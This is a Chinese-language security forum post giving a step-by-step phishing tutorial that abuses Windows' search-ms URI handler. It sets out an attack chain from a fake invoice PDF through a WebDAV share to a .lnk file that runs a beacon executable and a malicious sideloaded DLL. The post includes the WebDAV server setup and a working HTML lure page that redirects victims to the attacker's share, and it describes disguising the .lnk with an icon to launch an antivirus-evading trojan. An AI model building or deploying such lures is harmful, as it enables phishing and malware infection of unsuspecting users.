安全矩阵

 找回密码
 立即注册
搜索
查看: 29|回复: 0

一种有趣的钓鱼方式

[复制链接]

11

主题

11

帖子

49

积分

新手上路

Rank: 1

积分
49
发表于 昨天 00:07 | 显示全部楼层 |阅读模式
[color=rgba(0, 0, 0, 0.9)]一些资源的截图:
[color=rgba(0, 0, 0, 0.9)]
[color=rgba(0, 0, 0, 0.9)]
[color=rgba(0, 0, 0, 0.9)]我们的攻击链如下:

Email --> invoice.pdf --> 包含一个链接 --> search-ms:query=decoy&crumb=location:\\\\127.0.0.1@5000\\dec&displayname=Hello, is it me you\'re looking for? --> invoice.lnk --> beacon.exe --> beacon.dll
[size=1.25]这里email邮件我们就不发了,我们直接从包含一个链接这里开始。
[size=1.25]如下是老外的示例网站:

https://dav.binary-offensive.com/webdav/searchms.html
[size=1.25]当我们去访问的时候他会要求我们打开资源管理器。
[color=rgba(0, 0, 0, 0.9)]
[size=1.25]我们先点击取消,右键查看源代码。
[size=1.25]可以看到这里是通过search-ms:query=test&crumb的方式来打开远程服务器上的文件,并且只会显示test命名的文件。
[color=rgba(0, 0, 0, 0.9)]
[size=1.25]其实这里的search-ms:query=test&crumb和我们直接使用exploerer.exe打开是差不多的。
[size=1.25]我们现在点击打开。
[size=1.25]可以看到他会自动打开资源管理器,里面只会显示一个test命名的文件,其他文件是不会显示的。
[color=rgba(0, 0, 0, 0.9)]
[size=1.25]那么我们在想如果说我们自己去搭建一个这样的html页面,然后我们只显示lnk文件其他文件都不显示的话,当目标点击lnk文件的时候会执行我们的白程序,然后去调用我们的黑dll。
[size=1.25]但是在这之前我们需要去搭建一个WebDav 来托管我们的文件。
[size=1.25]安装如下:

apt install python3-wsgidav
[size=1.25]然后我们就可以直接使用了。
[color=rgba(0, 0, 0, 0.9)]
[size=1.25]现在我们还需要去仿照老外的页面去做一个一模一样的页面即可。
[size=1.25]如下代码:
[size=1.25]这里的192.168.177.132是我的kali ip。dec是我的目录,这里的query参数查询的是以lnk命名文件。

<html><head>        <title>search-ms</title>        <script>                window.location.href = 'search-ms:query=lnk&crumb=location:\\\\192.168.177.132@5000\\dec&displayname=Hello, is it me you\'re looking for?';</script></head><body><center>        PoC triggering Microsoft's <b>search-ms</b> URI handler to open up Explorer previewing attacker's WebDAV contents.</br>        This is to lure victims into opening malicious files which could have led to their computers infection.<br/></center></body></html>
[size=1.25]可以看到当我们去访问的时候他会提示我们是否打开这个页面,这里因为是本地,所以我们直接创建的html文件,然后双击打开的,所以这里是file://想要打开应用程序,一般的话我们挂在我们的钓鱼网站即可,或者挂载在比如说有漏洞的地方,可以上传html文件的地方都是可以的。
[color=rgba(0, 0, 0, 0.9)]
[size=1.25]当我们去点击打开的时候。
[size=1.25]可以看到他会显示一个1.lnk文件,因为这个文件我们对他什么都没做处理,所以是没有图标的。
[color=rgba(0, 0, 0, 0.9)]
[size=1.25]如下可以看到我们的kali目录。
[color=rgba(0, 0, 0, 0.9)]
[size=1.25]那么我们现在将免杀马或者白程序,这里我就为了简单所以我们直接将马放到dev这个目录,然后给lnk文件去加个图标,让lnk文件去执行我们的马。
[size=1.25]本小节就先到这里,期待和您的下次相遇!!!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-6-13 22:39 , Processed in 0.018431 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表